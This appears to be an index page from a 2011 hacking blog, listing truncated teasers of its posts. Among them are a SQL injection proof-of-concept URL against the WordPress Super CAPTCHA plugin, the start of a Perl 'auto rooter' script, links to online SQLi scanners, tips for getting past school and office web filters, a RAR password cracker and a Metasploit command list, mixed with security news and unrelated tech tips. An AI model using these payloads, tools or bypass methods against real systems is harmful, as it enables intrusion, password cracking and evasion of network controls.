WordPress Super CAPTCHA plugin 2.2.4 SQL Injection Vulnerability

#Exploit Title: WordPress Super CAPTCHA plugin <= 2.2.4 SQL Injection Vulnerability # Date: 2011-08-26 #software Link: http://downloads.wordpress.org/plugin/super-capcha.2.2.4.zip # Version: 2.2.4 (tested) # Notes: user has to be logged in as "admin" and magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-admin/admin.php?page=super-captcha/Logs&markspam=-1' OR SLEEP(5)--%20 --------------- Vulnerable code --------------- if(isset($_REQUEST['markspam']))   ...

Read More

Adding Google 1+ Button To Your Website / Blog

Adding Google 1+ Button To Your Website / Blog 1 - Go here ==> http://www.google.com/webmasters/+1/button/ 2 - Choose your google 1+ button size and copy paste code given in the box in site 3 - Copy the code and paste where you want the Google 1+ button to appear  ...

Read More

Link Building Explained in Simple

I was going through go4expert and found a very good article about Link Building and it was really good so i thought to post it here Links are the lifeline for a successful website. Links will generally take the users to the preferred web pages on visiting a website. These links will actually provide a roadmap of the website and its functionalities. Who should build text links? It is mandatory that every website owner should start...

Read More

Auto Rooter Beta 2011 Code

2011 Linux Auto r00t3r Beta version 1.0 works well on unpatched systems. And requires internet connectivity currently for local exploits only.It is a perl script and very easy to understand, modify and work as per required environment. #!/usr/bin/perl#Coded By CrosS ( 2011 Linux Auto r00t3r )print "###########################################################n";print "#             (Beta 1.0 )   <a title="Auto rooter" href="http://www.pentestit.com/tag/auto-rooter/">Auto rooter</a> by CrosS          ...

Read More

List of online SQLI scanners

http://www.be007.gigfa.com/scanner/scanner.php http://www.sunmagazin.com/tools/hack/SQLI-Scan http://scanner.drie88.tk http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan http://wolfscps.com/gscanner.php enjoy :)&nb...

Read More

Access Blocked Websites in Schools , Colleges and Offices

Hi friends Today we will tell you how to access blocked Websites.Websites like facebook, twitter and other social networking sites are generally blocked in schools, colleges and offices. There exist some tricks by which you can bypass the restrictions and access blocked sites, the most obvious is the use of proxies or Anonymizer websites. But using proxies doesn’t always works as they gets blocked by firewall as well . Here I am...

Read More

Cracking Wirnar Passwords | Recover Wirnar Passwords

Wirnar Password Cracker / Recover  Download Here It uses a method called " BruteForce" to crack rar passwords its easy to use... if any one not understand how to use it...feel free to ask.. :) ...

Read More

Metasploit Cheat Sheet | Metasploit Commands

I was going through the Metasploit The Penetration Tester’s Guide by David Kennedy,Jim O’Gorman, Devon Kearns and Mati Aharoni . Guys I must say it is worth reading .  This is a reference for the most frequently used commands and syntax within Metasploit’s various interfaces and utilities.  MSFconsole Commands show exploits Show all exploits within the Framework. show payloads Show all payloads within the Framework. show...

Read More

Hacker Group Anonymous Aims to Destroy Facebook on Nov. 5 fact or romour !!!

Hackivist group Anonymous vows to "kill Facebook" on November 5, citing users' lack of choice in privacy as its reason for attack. The group of hackers has claimed participation in just about every recent notable hacking attack of this year and successfully broke into 70 law enforcement websites and took down the Syrian Ministry of Defense website this week alone. This recent interest in Facebook, despite a slew of privacy concerns raised against...

Read More

Citigroup hacked again - 92,000 customers info exposed from Japan

For the second time this year, Citigroup has suffered a major breach of its credit customers’ personal information; this time the breach involved 92,400 customers at its Japanese unit. Citigroup's Japanese credit card unit said personal information for more than 92,000 of its customers was illegally sold to a third party.The information exposed included the names, account numbers addresses, phone numbers birthdates, and sex of 92,408 credit card holders, Citi Cards Japan warned in an advisory (PDF) issued Friday. The personal identification numbers and card security codes were not accessed.Citi Cards Japan did not mention how customer...

Read More

Install Android Gingerbread 2.3 in Samsung Galaxy 5 [I5500/I5503] without rooting

Before going through this post i will suggest you to read previous post for froyo update in samsung galaxy here The Galaxy 5 I5500, also known as the Corby I5500 has been around in the Android world since June 2010. The phone is one of the lower-end budget friendly Android devices out there who’s time is running out as new devices and ROMs arrive on the scene. However, XDA-Developers forum member subpsyke has recently ported the famous CyanogenMod...

Read More

Apple iCloud PRICING INFO

Apple iCloud Pricing details revealed. 5GB of cloud storage will be free for users and they have to pay in between $20 and $100 a year for additional space. iCloud.com is open for developers now. Users can store videos, songs, pictures and other files for free upto 5GB.10GB of additional space will cost $20 a year 20GB will cost $40 and 50GB will cost $100 a year. In the UK, this pricing converts to £14 a year for 10GB of extra space, £28 for 20GB...

Read More

Increase Your Download Speed | Working Method With Pictures

Increase Your Download Speed |Working Method WithPictures he use of the terms uploading and downloading often imply that the data sent or received is to be stored permanently, or at least stored more than temporarily. In contrast, the term downloading is distinguished from the related concept of streaming, which indicates the receiving of data that is used near immediately as it is received, while the transmission is still in progress...

Read More

Spam King arrested for hacking 500,000 Facebook accounts

'Spam King' arrested for hacking 500,000 Facebook accountsA notorious spammer known as the “Spam King” has surrendered to the FBI on charges of bombarding Facebook users with unwanted messages after breaching the security 500,000 accounts.Sanford Wallace, 43, also known as "Spamford Wallace" and "David Frederix", was arrested in Las Vegas on Thursday.Wallace is accused of hacking into 500,000 accounts to harvest friend lists between November 2008...

Read More

Installing and Configuring Nessus on Backtrack

Download and Install Nessus From Its Official Website and then 1) Get a free activation key form Tenable/Nessus website 2) Enter the key using nessus-fetch command /opt/nessus/bin/nessus-fetch –register xxxx-xxxx-xxxx-xxxx3) Create a user and password/opt/nessus/sbin/nessus-adduser4) Start the service/etc/init.d/nessusd start5) Start Nessushttps://localhost:88...

Read More

Backtrack - Linux Based Penetration Testing OS

Backtrack the highest rated and acclaimed Linux security distribution to date. BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every...

Read More